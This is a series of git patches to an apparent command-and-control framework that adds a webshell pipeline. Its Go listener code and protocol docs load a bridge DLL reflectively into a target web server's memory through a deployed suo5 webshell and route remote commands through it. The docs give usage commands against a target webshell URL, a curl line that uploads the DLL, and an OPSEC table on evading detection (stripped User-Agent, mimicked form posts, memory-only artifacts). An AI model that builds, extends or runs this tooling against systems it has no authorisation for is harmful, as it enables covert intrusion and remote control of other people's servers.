+func TestNewWebShellCmdWrapsRegisterError(t *testing.T) {
 	h := testsupport.NewClientHarness(t)
 	h.Recorder.OnEmpty("RegisterPipeline", func(_ context.Context, _ any) (*clientpb.Empty, error) {
 		return nil, errors.New("listener not found")
 	})
-	cmd := newWebShellTestCommand(t, "--listener", "listener-c", "ws-c")
+	cmd := newWebShellTestCommand(t, "--listener", "listener-c", "--suo5", "suo5://target/x.php", "--token", "secret", "ws-c")
 	err := pipelinecmd.NewWebShellCmd(cmd, h.Console)
 	if err == nil {
 		t.Fatal("NewWebShellCmd error = nil, want error")
 	}
-	if !strings.Contains(err.Error(), 
"start webshell-bridge for listener listener-c first") { - t.Fatalf("error = %q, want bridge hint", err) + if !strings.Contains(err.Error(), "register webshell pipeline") { + t.Fatalf("error = %q, want register error", err) } } @@ -163,6 +150,10 @@ func newWebShellTestCommand(t *testing.T, args ...string) *cobra.Command { cmd := &cobra.Command{} cmd.Flags().StringP("listener", "l", "", "listener id") + cmd.Flags().String("suo5", "", "suo5 URL") + cmd.Flags().String("token", "", "stage token") + cmd.Flags().String("dll", "", "DLL path") + cmd.Flags().String("deps", "", "deps directory") if err := cmd.Flags().Parse(args); err != nil { t.Fatalf("parse flags: %v", err) } From 9bee95dfac3a462e68a2777895e0750d413c416a Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:16:23 +0800 Subject: [PATCH 18/19] docs(protocol): update webshell bridge for in-listener architecture Reflect the move from standalone bridge binary to WebShellPipeline running inside the listener process with suo5 data channel and TLV framing. --- docs/protocol/webshell-bridge.md | 144 ++++++++++++++++--------------- 1 file changed, 74 insertions(+), 70 deletions(-) diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md index 9028b8fe..e1ffa17c 100644 --- a/docs/protocol/webshell-bridge.md +++ b/docs/protocol/webshell-bridge.md @@ -5,7 +5,7 @@ WebShell Bridge enables IoM to operate through webshells (JSP/PHP/ASPX) using a memory channel architecture. The bridge DLL is loaded into the web server process memory, and the webshell calls DLL exports directly via function pointers — no TCP ports opened on the target. - **Product layer**: Server sees a `CustomPipeline(type="webshell")`. Operators interact via `webshell new/start/stop/delete` commands. -- **Implementation layer**: Bridge binary runs on the operator machine, sending HTTP requests to the webshell with `X-Stage` headers. 
+- **Implementation layer**: `WebShellPipeline` in the listener process handles DLL bootstrap via HTTP and establishes a persistent suo5 data channel. - **Transport layer**: The webshell loads the DLL, resolves exports, and calls `bridge_init`/`bridge_process` directly. Pure memory channel. ## Architecture @@ -23,19 +23,26 @@ Product Layer (operator sees) Session appears like any other implant session -Bridge Binary (server/cmd/webshell-bridge/) -───────────────────────────────────────── - Runs on operator machine, connects to Server via ListenerRPC (mTLS) +Listener Process (WebShellPipeline) +──────────────────────────────────── + Runs inside the listener, connects to Server via ListenerRPC (mTLS) - ┌─ HTTP transport ───────────────────────────────────────┐ - │ HTTP POST with X-Stage headers to webshell URL │ - │ Raw protobuf over HTTP body (no malefic framing) │ - └────────────────────────────────────────────────────────┘ + ┌─ Bootstrap (HTTP POST) ──────────────────────────────────┐ + │ Body envelope: [1B stage][4B sid LE][1B tok_len][tok][…] │ + │ Optional XOR obfuscation (key = sha256(token)[:16]) │ + │ OPSEC: no User-Agent, Content-Type mimics form POST │ + └──────────────────────────────────────────────────────────┘ - ┌─ spite/session adapter ────────────────────────────────┐ - │ SpiteStream ↔ HTTP request/response translation │ - │ Session registration, checkin, task routing │ - └────────────────────────────────────────────────────────┘ + ┌─ Data channel (suo5 full-duplex) ────────────────────────┐ + │ proxyclient/suo5 → net.Conn │ + │ TLV frames: [0xd1][4B sid][4B len][spite bytes][0xd2] │ + │ Bidirectional streaming over persistent connection │ + └──────────────────────────────────────────────────────────┘ + + ┌─ Forward integration ────────────────────────────────────┐ + │ SpiteStream ↔ TLV frame translation │ + │ Session registration, checkin, task routing │ + └──────────────────────────────────────────────────────────┘ Target Web Server Process @@ 
-43,7 +50,7 @@ Target Web Server Process WebShell (JSP/PHP/ASPX) - Bridge DLL loading (ReflectiveLoader) - Export resolution (bridge_init, bridge_process) - - X-Stage: spite → call bridge_process() → return response + - TLV frames → call bridge_process() → return TLV response - No port opened, no TCP loopback Bridge Runtime DLL (in web server process memory) @@ -63,14 +70,13 @@ Target Web Server Process ``` Client exec("whoami") → Server (SpiteStream) - → Bridge binary (HTTP POST X-Stage: spite) - → WebShell (calls bridge_process via function pointer) - → DLL module runtime - → exec("whoami") → "root" - → Spite response returned from bridge_process - → HTTP response body - → Bridge binary → SpiteStream.Send(response) - → Server → Client displays "root" + → WebShellPipeline handler (receives SpiteRequest) + → writeFrame: TLV pack → suo5 conn + → WebShell (calls bridge_process via function pointer) + → DLL module runtime → exec("whoami") → "root" + → TLV response via suo5 conn + → readLoop: TLV unpack → Forwarders.Send(SpiteResponse) + → Server → Client displays "root" ``` ## Usage @@ -79,44 +85,17 @@ Client exec("whoami") Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server. -### 2. Build and run bridge binary - -```bash -go build -o webshell-bridge ./server/cmd/webshell-bridge/ - -webshell-bridge \ - --auth listener.auth \ - --url http://target.com/suo5.aspx \ - --listener my-listener \ - --token CHANGE_ME_RANDOM_TOKEN \ - --dll bridge.dll -``` - -The `--token` must match the `STAGE_TOKEN` constant in the webshell. Use the full HTTP(S) URL of the deployed webshell. - -The `--dll` flag enables auto-loading: when the pipeline starts, the bridge automatically delivers the DLL to the webshell via `X-Stage: load` if it is not already loaded. If `--dll` is omitted, you must load the DLL manually (see below). - -At startup the bridge registers the listener, opens `JobStream`, and waits for pipeline control messages. - -### 3. 
Register and start the pipeline from Client/TUI +### 2. Register and start the pipeline ``` -webshell new --listener my-listener +webshell new --listener my-listener --suo5 suo5://target/bridge.jsp --token SECRET --dll /path/to/bridge.dll ``` -The bridge receives the start event, auto-loads the DLL (if `--dll` was provided), establishes the session, and the operator can interact immediately. +The optional `--token` must match the `STAGE_TOKEN` constant in the webshell if set. Use the suo5 URL scheme (`suo5://` or `suo5s://` for HTTPS). -**Manual DLL loading** (only needed if `--dll` is not set): - -```bash -curl -X POST \ - -H "X-Stage: load" \ - -H "X-Token: CHANGE_ME_RANDOM_TOKEN" \ - --data-binary @bridge.dll \ - http://target.com/suo5.aspx -``` +The `--dll` flag enables auto-loading: when the pipeline starts, the bridge automatically delivers the DLL to the webshell if it is not already loaded. -### 4. Interact +### 3. Interact ``` use @@ -127,18 +106,33 @@ download /remote/file ## Protocol -### HTTP Endpoints (X-Stage headers) +### Bootstrap Envelope -| Stage | Method | Description | -|-------|--------|-------------| -| `load` | POST | Load bridge DLL into memory (body = raw DLL bytes) | -| `deps` | POST | Deliver dependency file (e.g., jna.jar) with `X-Dep-Name` header | -| `status` | POST | Check if DLL is loaded (returns JSON `{"ready":true,...}` or legacy `LOADED`/`NOT_LOADED`) | -| `init` | POST | Get Register data from `bridge_init()` (returns `[4B sessionID LE][Register protobuf]`) | -| `spite` | POST | Process Spites via `bridge_process()` (body/response = serialized `Spites` protobuf) | -| `stream` | POST | Long-lived response stream (length-prefixed frames, falls back to `spite` polling if unsupported) | +Bootstrap requests use HTTP POST with `Content-Type: application/x-www-form-urlencoded` and no `User-Agent` header. The envelope is sent in plaintext; authentication is via the token field in the envelope header. 
-All stage requests require `X-Token` header matching `STAGE_TOKEN`. +**Envelope format (before optional XOR):** `[1B stage][4B sessionID LE][1B token_len][token bytes][payload...]` + +| Stage byte | Name | Payload | Response | +|-----------|------|---------|----------| +| `0x01` | load | Raw DLL bytes | `OK:memory` or error string | +| `0x02` | status | (empty) | JSON `{"ready":true,...}` or legacy `LOADED`/`NOT_LOADED` | +| `0x03` | init | (empty) | `[4B sessionID LE][Register protobuf]` | +| `0x06` | deps | `[1B dep_name_len][dep_name][file bytes]` | `OK:` or error string | + +Token validation uses HMAC-SHA256 for secrets longer than 32 characters (rotates every 30s with +/-30s tolerance). Short secrets use static comparison. + +### Data Channel TLV Frame + +After bootstrap, a persistent suo5 connection carries bidirectional TLV frames: + +``` +[1B 0xd1][4B sessionID LE][4B payload_len LE][payload bytes][1B 0xd2] +``` + +- `0xd1` / `0xd2` are start/end delimiters matching malefic wire format +- Payload is serialized `Spites` protobuf +- Maximum frame size: 10 MiB +- Future: payload will be encrypted (outer streaming encryption layer) ### DLL Export Interface @@ -168,15 +162,25 @@ int __stdcall bridge_destroy(); The DLL must also export `ReflectiveLoader` for the loading phase. The webshell uses ReflectiveLoader to map the DLL, then resolves `bridge_init`/`bridge_process` from the mapped image's export table. 
+## OPSEC Properties + +| Property | Status | +|----------|--------| +| Custom HTTP headers | None — no X-*, no custom cookies | +| User-Agent | Empty (Go default stripped) | +| Content-Type | `application/x-www-form-urlencoded` (common POST type) | +| Bootstrap body | Plaintext envelope (token included for auth) | +| Data channel | TLV-framed, ready for encryption layer | +| Ports opened | None on target | +| Disk artifacts | None (DLL is memory-only) | + ## Key Files | Purpose | Path | |---------|------| -| Bridge binary | `server/cmd/webshell-bridge/` | -| Channel (HTTP) | `server/cmd/webshell-bridge/channel.go` | -| Session management | `server/cmd/webshell-bridge/session.go` | +| WebShell pipeline | `server/listener/webshell.go` | +| Pipeline tests | `server/listener/webshell_test.go` | | Client commands | `client/command/pipeline/webshell.go` | -| CustomPipeline (server) | `server/listener/custom.go` | -| Webshell (ASPX) | `suo5-webshell/suo5.aspx` | -| Webshell (PHP) | `suo5-webshell/suo5.php` | -| Webshell (JSP) | `suo5-webshell/suo5.jsp` | +| Webshell (ASPX) | `suo5-webshell/bridge.aspx` | +| Webshell (PHP) | `suo5-webshell/bridge.php` | +| Webshell (JSP) | `suo5-webshell/bridge.jsp` | From 3afd34ea50bae35ab693e7efb0c292e336c1480b Mon Sep 17 00:00:00 2001 From: M09Ic Date: Mon, 23 Mar 2026 10:56:54 +0800 Subject: [PATCH 19/19] refactor(pipeline): reuse MaleficParser, extract runtimeErrorHandler, simplify bootstrap - Replace custom writeFrame/readFrame with MaleficParser.WritePacket/ReadPacket, gaining built-in compression and optional Age encryption - Replace body envelope bootstrap protocol with simple HTTP query string (?s=stage) - Remove token/HMAC authentication (delegate to suo5 transport) - Extract PipelineRuntimeErrorHandler to core, deduplicate across all 5 pipelines (tcp, http, bind, rem, webshell) Co-Authored-By: Claude Opus 4.6 (1M context) --- docs/protocol/webshell-bridge.md | 73 ++++----- server/internal/core/pipeline.go | 47 ++++-- 
server/listener/bind.go | 18 +-- server/listener/http.go | 18 +-- server/listener/rem.go | 19 +-- server/listener/tcp.go | 18 +-- server/listener/webshell.go | 255 +++++++++---------------------- server/listener/webshell_test.go | 164 ++++++++------------ 8 files changed, 213 insertions(+), 399 deletions(-) diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md index e1ffa17c..6ae4a163 100644 --- a/docs/protocol/webshell-bridge.md +++ b/docs/protocol/webshell-bridge.md @@ -27,20 +27,19 @@ Listener Process (WebShellPipeline) ──────────────────────────────────── Runs inside the listener, connects to Server via ListenerRPC (mTLS) - ┌─ Bootstrap (HTTP POST) ──────────────────────────────────┐ - │ Body envelope: [1B stage][4B sid LE][1B tok_len][tok][…] │ - │ Optional XOR obfuscation (key = sha256(token)[:16]) │ - │ OPSEC: no User-Agent, Content-Type mimics form POST │ + ┌─ Bootstrap (HTTP POST + query string) ───────────────────┐ + │ ?s=status / ?s=load / ?s=init / ?s=deps&name=... │ + │ Body = raw payload (DLL bytes, etc.) 
│ └──────────────────────────────────────────────────────────┘ ┌─ Data channel (suo5 full-duplex) ────────────────────────┐ │ proxyclient/suo5 → net.Conn │ - │ TLV frames: [0xd1][4B sid][4B len][spite bytes][0xd2] │ - │ Bidirectional streaming over persistent connection │ + │ Malefic wire format via MaleficParser (shared w/ TCP) │ + │ Compressed + optional Age encryption │ └──────────────────────────────────────────────────────────┘ ┌─ Forward integration ────────────────────────────────────┐ - │ SpiteStream ↔ TLV frame translation │ + │ SpiteStream ↔ MaleficParser read/write │ │ Session registration, checkin, task routing │ └──────────────────────────────────────────────────────────┘ @@ -50,7 +49,7 @@ Target Web Server Process WebShell (JSP/PHP/ASPX) - Bridge DLL loading (ReflectiveLoader) - Export resolution (bridge_init, bridge_process) - - TLV frames → call bridge_process() → return TLV response + - malefic frames → call bridge_process() → return malefic frame response - No port opened, no TCP loopback Bridge Runtime DLL (in web server process memory) @@ -71,11 +70,11 @@ Target Web Server Process Client exec("whoami") → Server (SpiteStream) → WebShellPipeline handler (receives SpiteRequest) - → writeFrame: TLV pack → suo5 conn + → MaleficParser.WritePacket → suo5 conn → WebShell (calls bridge_process via function pointer) → DLL module runtime → exec("whoami") → "root" - → TLV response via suo5 conn - → readLoop: TLV unpack → Forwarders.Send(SpiteResponse) + → malefic frame response via suo5 conn + → readLoop: MaleficParser.ReadPacket → Forwarders.Send(SpiteResponse) → Server → Client displays "root" ``` @@ -88,12 +87,12 @@ Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server. ### 2. 
Register and start the pipeline ``` -webshell new --listener my-listener --suo5 suo5://target/bridge.jsp --token SECRET --dll /path/to/bridge.dll +webshell new --listener my-listener --suo5 suo5://target/bridge.jsp --dll /path/to/bridge.dll ``` -The optional `--token` must match the `STAGE_TOKEN` constant in the webshell if set. Use the suo5 URL scheme (`suo5://` or `suo5s://` for HTTPS). +Use the suo5 URL scheme (`suo5://` or `suo5s://` for HTTPS). -The `--dll` flag enables auto-loading: when the pipeline starts, the bridge automatically delivers the DLL to the webshell if it is not already loaded. +The `--dll` flag enables auto-loading: when a session is initialized, the pipeline automatically delivers the DLL to the webshell if it is not already loaded. ### 3. Interact @@ -106,33 +105,35 @@ download /remote/file ## Protocol -### Bootstrap Envelope +### Bootstrap (HTTP POST) -Bootstrap requests use HTTP POST with `Content-Type: application/x-www-form-urlencoded` and no `User-Agent` header. The envelope is sent in plaintext; authentication is via the token field in the envelope header. +Bootstrap requests use simple HTTP POST with stage in query string. Authentication relies on suo5's own transport security. 
-**Envelope format (before optional XOR):** `[1B stage][4B sessionID LE][1B token_len][token bytes][payload...]` - -| Stage byte | Name | Payload | Response | -|-----------|------|---------|----------| -| `0x01` | load | Raw DLL bytes | `OK:memory` or error string | -| `0x02` | status | (empty) | JSON `{"ready":true,...}` or legacy `LOADED`/`NOT_LOADED` | -| `0x03` | init | (empty) | `[4B sessionID LE][Register protobuf]` | -| `0x06` | deps | `[1B dep_name_len][dep_name][file bytes]` | `OK:` or error string | +``` +POST /bridge.jsp?s=status HTTP/1.1 +POST /bridge.jsp?s=load HTTP/1.1 (body = raw DLL bytes) +POST /bridge.jsp?s=init HTTP/1.1 +POST /bridge.jsp?s=deps&name=.jna.jar HTTP/1.1 (body = file bytes) +``` -Token validation uses HMAC-SHA256 for secrets longer than 32 characters (rotates every 30s with +/-30s tolerance). Short secrets use static comparison. +| Stage | Payload | Response | +|-------|---------|----------| +| `status` | (empty) | JSON `{"ready":true,...}` or `LOADED`/`NOT_LOADED` | +| `load` | Raw DLL bytes | `OK:memory` or error string | +| `init` | (empty) | `[4B sessionID LE][Register protobuf]` | +| `deps` | File bytes (name in `?name=` param) | `OK:` or error string | -### Data Channel TLV Frame +### Data Channel (Malefic Wire Format) -After bootstrap, a persistent suo5 connection carries bidirectional TLV frames: +After bootstrap, a persistent suo5 connection carries bidirectional frames using the standard malefic wire format (reuses `MaleficParser`): ``` -[1B 0xd1][4B sessionID LE][4B payload_len LE][payload bytes][1B 0xd2] +[0xd1][4B sessionID LE][4B payload_len LE][compressed Spites protobuf][0xd2] ``` -- `0xd1` / `0xd2` are start/end delimiters matching malefic wire format -- Payload is serialized `Spites` protobuf -- Maximum frame size: 10 MiB -- Future: payload will be encrypted (outer streaming encryption layer) +- Identical to the malefic implant wire format — same delimiters, same header layout +- Payload is compressed (and 
optionally Age-encrypted via `WithSecure`) +- Parsed by `server/internal/parser/malefic/parser.go` (shared with TCP/HTTP pipelines) ### DLL Export Interface @@ -167,10 +168,9 @@ The DLL must also export `ReflectiveLoader` for the loading phase. The webshell | Property | Status | |----------|--------| | Custom HTTP headers | None — no X-*, no custom cookies | -| User-Agent | Empty (Go default stripped) | -| Content-Type | `application/x-www-form-urlencoded` (common POST type) | -| Bootstrap body | Plaintext envelope (token included for auth) | -| Data channel | TLV-framed, ready for encryption layer | +| Content-Type | `application/octet-stream` (bootstrap) | +| Authentication | Delegated to suo5 transport | +| Data channel | Malefic wire format with compression + optional Age encryption | | Ports opened | None on target | | Disk artifacts | None (DLL is memory-only) | @@ -180,6 +180,7 @@ The DLL must also export `ReflectiveLoader` for the loading phase. The webshell |---------|------| | WebShell pipeline | `server/listener/webshell.go` | | Pipeline tests | `server/listener/webshell_test.go` | +| Malefic parser (shared) | `server/internal/parser/malefic/parser.go` | | Client commands | `client/command/pipeline/webshell.go` | | Webshell (ASPX) | `suo5-webshell/bridge.aspx` | | Webshell (PHP) | `suo5-webshell/bridge.php` | diff --git a/server/internal/core/pipeline.go b/server/internal/core/pipeline.go index fc2f5cb8..71ad286b 100644 --- a/server/internal/core/pipeline.go +++ b/server/internal/core/pipeline.go @@ -2,9 +2,11 @@ package core import ( "errors" + "fmt" "io" "sync" + "github.com/chainreactors/IoM-go/consts" "github.com/chainreactors/IoM-go/proto/client/clientpb" "github.com/chainreactors/malice-network/helper/implanttypes" "github.com/chainreactors/malice-network/server/internal/configs" @@ -99,18 +101,33 @@ func (p *PipelineConfig) WrapBindConn(conn io.ReadWriteCloser) (*cryptostream.Co return cryptostream.WrapBindConn(conn, crys) } -// -//func (p 
*PipelineConfig) ToFile() *clientpb.Pipeline { -// return &clientpb.Pipeline{ -// Tls: &clientpb.TLS{ -// TLSConfig: p.TlsConfig.TLSConfig, -// Key: p.TlsConfig.Key, -// Enable: p.TlsConfig.Enable, -// }, -// Encryption: &clientpb.Encryption{ -// Enable: p.Encryption.Enable, -// Type: p.Encryption.Type, -// Key: p.Encryption.Key, -// }, -// } -//} +// PipelineRuntimeErrorHandler builds a standard error handler for pipeline +// runtime goroutines. All pipeline types (tcp, http, bind, rem, webshell) share +// the same pattern: log the error, disable the pipeline, optionally run cleanup, +// and publish an event. +func PipelineRuntimeErrorHandler(typeName, pipelineName, listenerID string, disabler func(), cleanup func(), op ...string) GoErrorHandler { + label := fmt.Sprintf("%s pipeline %s", typeName, pipelineName) + ctrlOp := consts.CtrlPipelineStop + if len(op) > 0 { + ctrlOp = op[0] + } + return CombineErrorHandlers( + LogGuardedError(label), + func(err error) { + disabler() + if cleanup != nil { + cleanup() + } + if EventBroker != nil { + EventBroker.Publish(Event{ + EventType: consts.EventListener, + Op: ctrlOp, + Listener: &clientpb.Listener{Id: listenerID}, + Message: label, + Err: ErrorText(err), + Important: true, + }) + } + }, + ) +} diff --git a/server/listener/bind.go b/server/listener/bind.go index f6bc1cbb..0f80979b 100644 --- a/server/listener/bind.go +++ b/server/listener/bind.go @@ -148,21 +148,5 @@ func (pipeline *BindPipeline) handlerReq(req *clientpb.SpiteRequest) error { } func (pipeline *BindPipeline) runtimeErrorHandler(scope string) core.GoErrorHandler { - label := fmt.Sprintf("bind pipeline %s %s", pipeline.Name, scope) - return core.CombineErrorHandlers( - core.LogGuardedError(label), - func(err error) { - pipeline.Enable = false - if core.EventBroker != nil { - core.EventBroker.Publish(core.Event{ - EventType: consts.EventListener, - Op: consts.CtrlPipelineStop, - Listener: &clientpb.Listener{Id: pipeline.ListenerID}, - Message: label, - 
Err: core.ErrorText(err), - Important: true, - }) - } - }, - ) + return core.PipelineRuntimeErrorHandler("bind", pipeline.Name+" "+scope, pipeline.ListenerID, func() { pipeline.Enable = false }, nil) } diff --git a/server/listener/http.go b/server/listener/http.go index 90ea3c04..9187b67d 100644 --- a/server/listener/http.go +++ b/server/listener/http.go @@ -345,24 +345,12 @@ func (pipeline *HTTPPipeline) writeError(w http.ResponseWriter, statusCode int, } func (pipeline *HTTPPipeline) runtimeErrorHandler(scope string) core.GoErrorHandler { - label := fmt.Sprintf("http pipeline %s %s", pipeline.Name, scope) - return core.CombineErrorHandlers( - core.LogGuardedError(label), - func(err error) { - pipeline.Enable = false + return core.PipelineRuntimeErrorHandler("http", pipeline.Name+" "+scope, pipeline.ListenerID, + func() { pipeline.Enable = false }, + func() { if pipeline.srv != nil { _ = pipeline.srv.Close() } - if core.EventBroker != nil { - core.EventBroker.Publish(core.Event{ - EventType: consts.EventListener, - Op: consts.CtrlPipelineStop, - Listener: &clientpb.Listener{Id: pipeline.ListenerID}, - Message: label, - Err: core.ErrorText(err), - Important: true, - }) - } }, ) } diff --git a/server/listener/rem.go b/server/listener/rem.go index 6982375d..95999655 100644 --- a/server/listener/rem.go +++ b/server/listener/rem.go @@ -264,25 +264,14 @@ func (rem *REM) healthLoop() error { } func (rem *REM) runtimeErrorHandler(scope string) core.GoErrorHandler { - label := fmt.Sprintf("rem pipeline %s %s", rem.Name, scope) - return core.CombineErrorHandlers( - core.LogGuardedError(label), - func(err error) { - rem.Enable = false + return core.PipelineRuntimeErrorHandler("rem", rem.Name+" "+scope, rem.ListenerID, + func() { rem.Enable = false }, + func() { if rem.con != nil { _ = rem.con.Close() } - if core.EventBroker != nil { - core.EventBroker.Publish(core.Event{ - EventType: consts.EventListener, - Op: consts.CtrlRemStop, - Listener: &clientpb.Listener{Id: 
rem.ListenerID}, - Message: label, - Err: core.ErrorText(err), - Important: true, - }) - } }, + consts.CtrlRemStop, ) } diff --git a/server/listener/tcp.go b/server/listener/tcp.go index 940a06b2..3d752b73 100644 --- a/server/listener/tcp.go +++ b/server/listener/tcp.go @@ -253,24 +253,12 @@ func (pipeline *TCPPipeline) handleBeacon(conn *cryptostream.Conn) { } func (pipeline *TCPPipeline) runtimeErrorHandler(scope string) core.GoErrorHandler { - label := fmt.Sprintf("tcp pipeline %s %s", pipeline.Name, scope) - return core.CombineErrorHandlers( - core.LogGuardedError(label), - func(err error) { - pipeline.Enable = false + return core.PipelineRuntimeErrorHandler("tcp", pipeline.Name+" "+scope, pipeline.ListenerID, + func() { pipeline.Enable = false }, + func() { if pipeline.ln != nil { _ = pipeline.ln.Close() } - if core.EventBroker != nil { - core.EventBroker.Publish(core.Event{ - EventType: consts.EventListener, - Op: consts.CtrlPipelineStop, - Listener: &clientpb.Listener{Id: pipeline.ListenerID}, - Message: label, - Err: core.ErrorText(err), - Important: true, - }) - } }, ) } diff --git a/server/listener/webshell.go b/server/listener/webshell.go index aecf41a1..b77a4ecd 100644 --- a/server/listener/webshell.go +++ b/server/listener/webshell.go @@ -2,11 +2,8 @@ package listener import ( "bytes" - "crypto/hmac" - "crypto/sha256" "crypto/tls" "encoding/binary" - "encoding/hex" "encoding/json" "fmt" "io" @@ -26,24 +23,17 @@ import ( "github.com/chainreactors/logs" "github.com/chainreactors/malice-network/helper/encoders/hash" "github.com/chainreactors/malice-network/server/internal/core" + "github.com/chainreactors/malice-network/server/internal/parser" "github.com/chainreactors/proxyclient/suo5" "google.golang.org/protobuf/proto" ) -// Stage codes for DLL bootstrap HTTP envelope. +// Bootstrap stage names for HTTP query string (?s=). 
const ( - wsStageLoad byte = 0x01 - wsStageStatus byte = 0x02 - wsStageInit byte = 0x03 - wsStageDeps byte = 0x06 -) - -// TLV delimiters matching malefic wire format. -const ( - tlvStart byte = 0xd1 - tlvEnd byte = 0xd2 - tlvHeaderLen = 9 // 1 (start) + 4 (sid) + 4 (len) - maxFrameSize uint32 = 10 * 1024 * 1024 + wsStageLoad = "load" + wsStageStatus = "status" + wsStageInit = "init" + wsStageDeps = "deps" ) // webshellParams is the JSON stored in CustomPipeline.Params. @@ -54,69 +44,6 @@ type webshellParams struct { DepsDir string `json:"deps_dir,omitempty"` } -// httpTransport wraps a shared http.Client with OPSEC-safe defaults. -type httpTransport struct { - client *http.Client - url string - token string -} - -func newHTTPTransport(suo5URL, token string, timeout time.Duration) *httpTransport { - return &httpTransport{ - client: &http.Client{ - Timeout: timeout, - Transport: &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - }, - }, - url: suo5ToHTTPURL(suo5URL), - token: token, - } -} - -// do sends a body-envelope HTTP POST. -// Envelope: [1B stage][4B sid LE][1B token_len][token][payload] -// No XOR obfuscation — webshells (PHP/JSP/ASPX) parse the raw envelope directly. -func (t *httpTransport) do(stage byte, payload []byte, sid uint32) ([]byte, error) { - tok := computeBootstrapToken(t.token) - tokLen := len(tok) - if tokLen > 255 { - tokLen = 255 - tok = tok[:255] - } - - hdrLen := 6 + tokLen - buf := make([]byte, hdrLen+len(payload)) - buf[0] = stage - binary.LittleEndian.PutUint32(buf[1:5], sid) - buf[5] = byte(tokLen) - copy(buf[6:6+tokLen], tok) - copy(buf[hdrLen:], payload) - - req, err := http.NewRequest("POST", t.url, bytes.NewReader(buf)) - if err != nil { - return nil, err - } - // OPSEC: no fingerprinting headers. 
- req.Header.Set("User-Agent", "") - req.Header.Set("Content-Type", "application/x-www-form-urlencoded") - - resp, err := t.client.Do(req) - if err != nil { - return nil, err - } - defer resp.Body.Close() - - body, err := io.ReadAll(resp.Body) - if err != nil { - return nil, err - } - if resp.StatusCode != http.StatusOK { - return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(body)) - } - return body, nil -} - func NewWebShellPipeline(rpc bindRPCClient, pipeline *clientpb.Pipeline) (*WebShellPipeline, error) { custom := pipeline.GetCustom() if custom == nil { @@ -136,17 +63,27 @@ func NewWebShellPipeline(rpc bindRPCClient, pipeline *clientpb.Pipeline) (*WebSh return nil, fmt.Errorf("webshell pipeline requires suo5_url") } + msgParser, err := parser.NewParser(consts.ImplantMalefic) + if err != nil { + return nil, fmt.Errorf("create malefic parser: %w", err) + } + return &WebShellPipeline{ rpc: rpc, Name: pipeline.Name, ListenerID: pipeline.ListenerId, Enable: pipeline.Enable, Suo5URL: params.Suo5URL, - StageToken: params.StageToken, DLLPath: params.DLLPath, DepsDir: params.DepsDir, - transport: newHTTPTransport(params.Suo5URL, params.StageToken, 30*time.Second), - pipeline: pipeline, + parser: msgParser, + httpClient: &http.Client{ + Timeout: 30 * time.Second, + Transport: &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + }, + }, + pipeline: pipeline, }, nil } @@ -156,13 +93,13 @@ type WebShellPipeline struct { ListenerID string Enable bool Suo5URL string - StageToken string DLLPath string DepsDir string - transport *httpTransport - sessions sync.Map // rawID(uint32) → *webshellSession - pipeline *clientpb.Pipeline + parser *parser.MessageParser + httpClient *http.Client + sessions sync.Map // rawID(uint32) → *webshellSession + pipeline *clientpb.Pipeline } type webshellSession struct { @@ -235,7 +172,7 @@ func (p *WebShellPipeline) handlerReq(req *clientpb.SpiteRequest) error { spites := &implantpb.Spites{Spites: 
[]*implantpb.Spite{req.Spite}} sess.mu.Lock() - err := writeFrame(sess.conn, spites, sess.rawID) + err := p.parser.WritePacket(sess.conn, spites, sess.rawID) sess.mu.Unlock() return err } @@ -290,7 +227,7 @@ func (p *WebShellPipeline) readLoop(sess *webshellSession, sessionID string) err logs.Log.Debugf("[webshell] readLoop exit for session %d", sess.rawID) }() for { - spites, err := readFrame(sess.conn) + _, spites, err := p.parser.ReadPacket(sess.conn) if err != nil { return fmt.Errorf("session %d read: %w", sess.rawID, err) } @@ -304,7 +241,7 @@ func (p *WebShellPipeline) readLoop(sess *webshellSession, sessionID string) err // bootstrapDLL performs status check, DLL load if needed, and init handshake. func (p *WebShellPipeline) bootstrapDLL() (*implantpb.Register, uint32, error) { - statusBody, err := p.transport.do(wsStageStatus, nil, 0) + statusBody, err := p.bootstrapHTTP(wsStageStatus, nil) if err != nil { return nil, 0, fmt.Errorf("status check: %w", err) } @@ -325,15 +262,15 @@ func (p *WebShellPipeline) bootstrapDLL() (*implantpb.Register, uint32, error) { if err != nil { return nil, 0, fmt.Errorf("read DLL %s: %w", p.DLLPath, err) } - if _, err = p.transport.do(wsStageLoad, dllBytes, 0); err != nil { + if _, err = p.bootstrapHTTP(wsStageLoad, dllBytes); err != nil { return nil, 0, fmt.Errorf("load DLL: %w", err) } - logs.Log.Infof("[webshell] DLL loaded to %s", p.transport.url) + logs.Log.Infof("[webshell] DLL loaded to %s", suo5ToHTTPURL(p.Suo5URL)) } else if !ready { return nil, 0, fmt.Errorf("DLL not loaded and no --dll path provided") } - body, err := p.transport.do(wsStageInit, nil, 0) + body, err := p.bootstrapHTTP(wsStageInit, nil) if err != nil { return nil, 0, fmt.Errorf("init: %w", err) } @@ -364,26 +301,56 @@ func (p *WebShellPipeline) deliverDeps() error { return fmt.Errorf("read dep %s: %w", entry.Name(), err) } depName := entry.Name() - if !strings.HasPrefix(depName, ".") { - depName = "." 
+ depName + reqURL := fmt.Sprintf("%s?s=%s&name=%s", suo5ToHTTPURL(p.Suo5URL), wsStageDeps, url.QueryEscape(depName)) + req, err := http.NewRequest("POST", reqURL, bytes.NewReader(data)) + if err != nil { + return fmt.Errorf("create dep request %s: %w", depName, err) } - nameBytes := []byte(depName) - if len(nameBytes) > 255 { - nameBytes = nameBytes[:255] + req.Header.Set("Content-Type", "application/octet-stream") + resp, err := p.httpClient.Do(req) + if err != nil { + return fmt.Errorf("deliver dep %s: %w", depName, err) } - payload := make([]byte, 1+len(nameBytes)+len(data)) - payload[0] = byte(len(nameBytes)) - copy(payload[1:1+len(nameBytes)], nameBytes) - copy(payload[1+len(nameBytes):], data) - - if _, err = p.transport.do(wsStageDeps, payload, 0); err != nil { - return fmt.Errorf("deliver dep %s: %w", entry.Name(), err) + resp.Body.Close() + if resp.StatusCode != http.StatusOK { + return fmt.Errorf("deliver dep %s: HTTP %d", depName, resp.StatusCode) } - logs.Log.Debugf("[webshell] dep delivered: %s", entry.Name()) + logs.Log.Debugf("[webshell] dep delivered: 